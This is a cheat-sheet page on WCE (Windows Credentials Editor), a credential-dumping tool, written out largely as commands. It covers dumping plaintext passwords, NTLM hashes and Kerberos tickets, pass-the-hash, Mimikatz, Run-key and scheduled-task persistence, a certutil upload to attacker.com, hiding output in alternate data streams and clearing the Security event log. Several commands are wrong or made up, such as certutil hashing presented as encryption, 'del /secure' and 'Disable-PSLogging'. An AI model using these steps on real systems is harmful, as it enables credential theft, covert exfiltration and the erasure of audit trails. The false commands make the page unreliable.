WCE (Windows Credentials Editor)
Overview
Section intitulée « Overview »WCE (Windows Credentials Editor) is a specialized tool for extracting and manipulating Windows credentials from memory. It allows authorized security professionals to view plaintext passwords, NTLM hashes, and Kerberos tickets from running processes. WCE is used in authorized penetration testing, red team exercises, and security research on Windows systems.
Prerequisites
Section intitulée « Prerequisites »- Windows system with administrator privileges
- Understanding of Windows credential storage mechanisms
- Authorization to perform credential testing
Installation
Section intitulée « Installation »Direct Download
Section intitulée « Direct Download »Download the precompiled binary from the official release site:
# Download wce.exe
# SHA256: Verify checksum before execution
certutil -hashfile wce.exe SHA256Compilation (Optional)
Section intitulée « Compilation (Optional) »# For advanced users compiling from source
# Requires Windows development environment
# gcc or MSVC toolchain
gcc -o wce.exe wce.cFile Structure
Section intitulée « File Structure »wce/
├── wce.exe # Main executable (32-bit)
├── wce-universal.exe # Universal binary
├── README.txt
└── CHANGELOGBasic Commands
Section intitulée « Basic Commands »| Command | Description |
|---|---|
wce -l | List all credentials in memory |
wce -c | Display running processes with credentials |
wce -g | Get credentials from specific process |
wce -s | Start process and extract credentials |
wce -k | Extract Kerberos tickets |
wce -n | Extract NTLM hashes |
wce -w | Write credentials to file |
wce -h | Display help information |
Credential Extraction
Section intitulée « Credential Extraction »List All Credentials
Section intitulée « List All Credentials »# Extract all credentials from memory
wce -l
# Output example:
# User: DOMAIN\Administrator
# Password: P@ssw0rd123
# Hash: 8846f7eaee8fb117ad06bdd830b7586cExtract from Specific Process
Section intitulée « Extract from Specific Process »# Get credentials from a specific PID
wce -l -s ProcessName
# Get credentials from explorer.exe
wce -l -s explorer.exe
# Get credentials from svchost.exe
wce -l -s svchost.exeVerbose Output
Section intitulée « Verbose Output »# Detailed credential information
wce -l -v
# Shows:
# - Username
# - Domain
# - Plaintext password
# - NTLM hash
# - Process ID
# - Credential typeNTLM Hash Extraction
Section intitulée « NTLM Hash Extraction »Extract NTLM Hashes
Section intitulée « Extract NTLM Hashes »# Get all NTLM hashes from memory
wce -l -n
# Output format:
# username:domain:lmhash:ntmhash
# Administrator:WORKGROUP:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586cSave Hashes to File
Section intitulée « Save Hashes to File »# Export hashes for crack attempt
wce -l -n > hashes.txt
# Format for hashcat/john:
# username:uid:lmhash:ntmhash:::Identify Hash Types
Section intitulée « Identify Hash Types »# Determine which hashes are present
wce -l -n | findstr /v "aad3b435b51404eeaad3b435b51404ee"
# aad3b435b51404eeaad3b435b51404ee is empty LM hash indicatorKerberos Ticket Extraction
Section intitulée « Kerberos Ticket Extraction »Extract Kerberos Tickets
Section intitulée « Extract Kerberos Tickets »# List all Kerberos tickets in memory
wce -l -k
# Output shows:
# - Service ticket granting ticket (TGT)
# - Service tickets (ST)
# - Session keysExport Tickets for Pass-the-Ticket
Section intitulée « Export Tickets for Pass-the-Ticket »# Extract ticket in base64 format
wce -l -k -b > tickets.txt
# Import and use with ptk tools
# or Mimikatz pass-the-ticket functionalityProcess Monitoring
Section intitulée « Process Monitoring »Monitor Running Processes
Section intitulée « Monitor Running Processes »# List processes with cached credentials
wce -c
# Shows active processes with credential handles
# Useful for targeting services and system processesDump Credentials from Service Account
Section intitulée « Dump Credentials from Service Account »# Target specific service
wce -l -s "SQL Server (MSSQLSERVER)"
# Target IIS application pool
wce -l -s "w3wp.exe"
# Target backup service
wce -l -s "mbsvc.exe"Advanced Usage
Section intitulée « Advanced Usage »Silent Extraction Mode
Section intitulée « Silent Extraction Mode »# Extract without user feedback
wce -l -s ProcessName -w output.txt
# Redirect all output to file
# Useful for automated red team operationsFilter Credentials by Domain
Section intitulée « Filter Credentials by Domain »# Extract only domain credentials
wce -l | findstr "DOMAIN\"
# Extract local machine credentials
wce -l | findstr /v "DOMAIN"Continuous Monitoring
Section intitulée « Continuous Monitoring »# Monitor for new credentials over time
wce -l > credentials_snapshot.txt
# Wait and capture changes
timeout /t 300
wce -l > credentials_update.txt
# Compare snapshots
fc credentials_snapshot.txt credentials_update.txtIntegration with Other Tools
Section intitulée « Integration with Other Tools »Pass-the-Hash with WCE
Section intitulée « Pass-the-Hash with WCE »# Extract NTLM hash
wce -l -n > hashes.txt
# Use with PsExec pass-the-hash:
# psexec.exe -h \\targethost -u DOMAIN\user -p :ntmhash cmd.exeCredential Dumping Pipeline
Section intitulée « Credential Dumping Pipeline »# Extract and prepare for cracking
wce -l -n | sed 's/:.*$//' > usernames.txt
wce -l -n | sed 's/.*://' > hashes.txt
# Match for rainbow table lookup
# or GPU cracking with hashcatIntegration with Mimikatz
Section intitulée « Integration with Mimikatz »# WCE focuses on memory extraction
# Mimikatz handles encryption/logonsessions
# Complement with Mimikatz:
# mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"
# Compare results for complete credential auditSecure Credential Handling
Section intitulée « Secure Credential Handling »Encrypt Exported Credentials
Section intitulée « Encrypt Exported Credentials »# Export and encrypt immediately
wce -l > creds.txt
# Encrypt output
certutil -hashfile creds.txt SHA256
# Delete original
del /secure creds.txtLog Credential Access
Section intitulée « Log Credential Access »# Create audit trail
echo [%date% %time%] WCE executed by %username% >> audit.log
wce -l >> audit.log
# Encrypt audit log
cipher /e /s:%cd% audit.logDetection and Evasion
Section intitulée « Detection and Evasion »Stealth Extraction
Section intitulée « Stealth Extraction »# Run from temporary location
cd %temp%
wce.exe -l > output.txt
# Use alternate data streams (Windows)
wce.exe -l > output.txt:hidden
# Clean temporary artifacts
del output.txtTiming Considerations
Section intitulée « Timing Considerations »# Extract during user logon/logoff
# When credentials are most likely in memory
# Target peak hours for service credentials
# Avoid antivirus scan windowsTroubleshooting
Section intitulée « Troubleshooting »No Credentials Found
Section intitulée « No Credentials Found »# Issue: No credentials displayed
# Solution 1: Verify admin privileges
whoami /priv | findstr SeDebugPrivilege
# Solution 2: Check for 64-bit vs 32-bit mismatch
wce.exe -l # 32-bit
# Try 64-bit version for x64 systemsAccess Denied Error
Section intitulée « Access Denied Error »# Issue: "Access Denied" when running WCE
# Solution: Run as Administrator
# Method 1: Right-click Run as Administrator
# Method 2: From admin command prompt
wce.exe -l
# Method 3: Schedule as SYSTEM
schtasks /create /tn "CredDump" /tr "wce.exe -l" /sc once /st 12:00Missing Credentials
Section intitulée « Missing Credentials »# Issue: Expected credentials not shown
# Possible causes:
# 1. Credentials cleared from memory
# 2. User not logged in
# 3. Process permissions restrict access
# Solution: Check active sessions
wce -c
# Wait for user to interact with system
# Credentials cached when passwords enteredOperational Security
Section intitulée « Operational Security »OPSEC Best Practices
Section intitulée « OPSEC Best Practices »# 1. Use temporary filenames
set /p filename=<nul
wce.exe -l > %random%.txt
# 2. Compress and encrypt output
wce.exe -l | gzip > creds.gz
# Transfer via encrypted channel
# 3. Delete WCE and artifacts
del wce.exe
del %random%.txtDetection Mitigation
Section intitulée « Detection Mitigation »# 1. Disable Windows Update notifications
# 2. Clear event logs
wevtutil cl Security
# 3. Remove command history
history -c
# 4. Close all logging
# Disable PowerShell logging
powershell -NoProfile -Command "Disable-PSLogging"Practical Examples
Section intitulée « Practical Examples »Red Team Credential Harvesting
Section intitulée « Red Team Credential Harvesting »# Establish persistence
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "Cred" /d "C:\Windows\Temp\wce.exe -l > C:\Windows\Temp\log.txt"
# Create scheduled task for periodic dumps
schtasks /create /tn "System Maintenance" /tr "C:\Windows\Temp\wce.exe -l >> C:\Windows\Temp\log.txt" /sc hourly
# Exfiltrate credentials
certutil -urlcache -f "http://attacker.com/upload.php?data=" log.txtPrivilege Escalation Chain
Section intitulée « Privilege Escalation Chain »# 1. Get current user credentials
wce -l -s explorer.exe
# 2. Extract service account credentials
wce -l -s svchost.exe
# 3. Use extracted credentials for lateral movement
# psexec -u DOMAIN\serviceaccount -p password \\target cmd.exeCredential Audit
Section intitulée « Credential Audit »# Comprehensive audit script
@echo off
echo [*] WCE Credential Audit - %date% %time%
wce -l -v >> audit_report.txt
echo.
echo [*] NTLM Hashes:
wce -l -n >> audit_report.txt
echo.
echo [*] Kerberos Tickets:
wce -l -k >> audit_report.txt
echo Audit complete - results in audit_report.txtComparison with Similar Tools
Section intitulée « Comparison with Similar Tools »| Tool | Purpose | Focus |
|---|---|---|
| WCE | Plaintext password extraction | Windows credentials in memory |
| Mimikatz | Complete Windows security analysis | Encryption, logon sessions |
| ProcDump | Memory dump utility | Generic process memory |
| PowerSploit | PowerShell exploitation framework | Full Windows exploitation |
| Responder | LLMNR/NBNS poisoning | Network credential capture |
Limitations
Section intitulée « Limitations »- Requires admin privileges
- Plaintext passwords limited to cached/active sessions
- Works primarily on Windows systems
- Modern credential guard may limit effectiveness
- Service account passwords vary by running context
Related Tools
Section intitulée « Related Tools »- Mimikatz: More comprehensive Windows exploitation
- Responder: Network-based credential capture
- LaZagne: Cross-platform credential recovery
- CrackMapExec: Lateral movement and credential testing
References
Section intitulée « References »- Windows Credentials Editor Repository
- NTLM Hash Specification Microsoft Docs
- Kerberos Authentication RFC 4120
- Credential Guard Microsoft Security Blog
Legal Notice
Section intitulée « Legal Notice »WCE is designed for authorized security testing, red team exercises, and defensive research. Unauthorized access to computer systems is illegal. Only use on systems you own or have explicit written permission to test.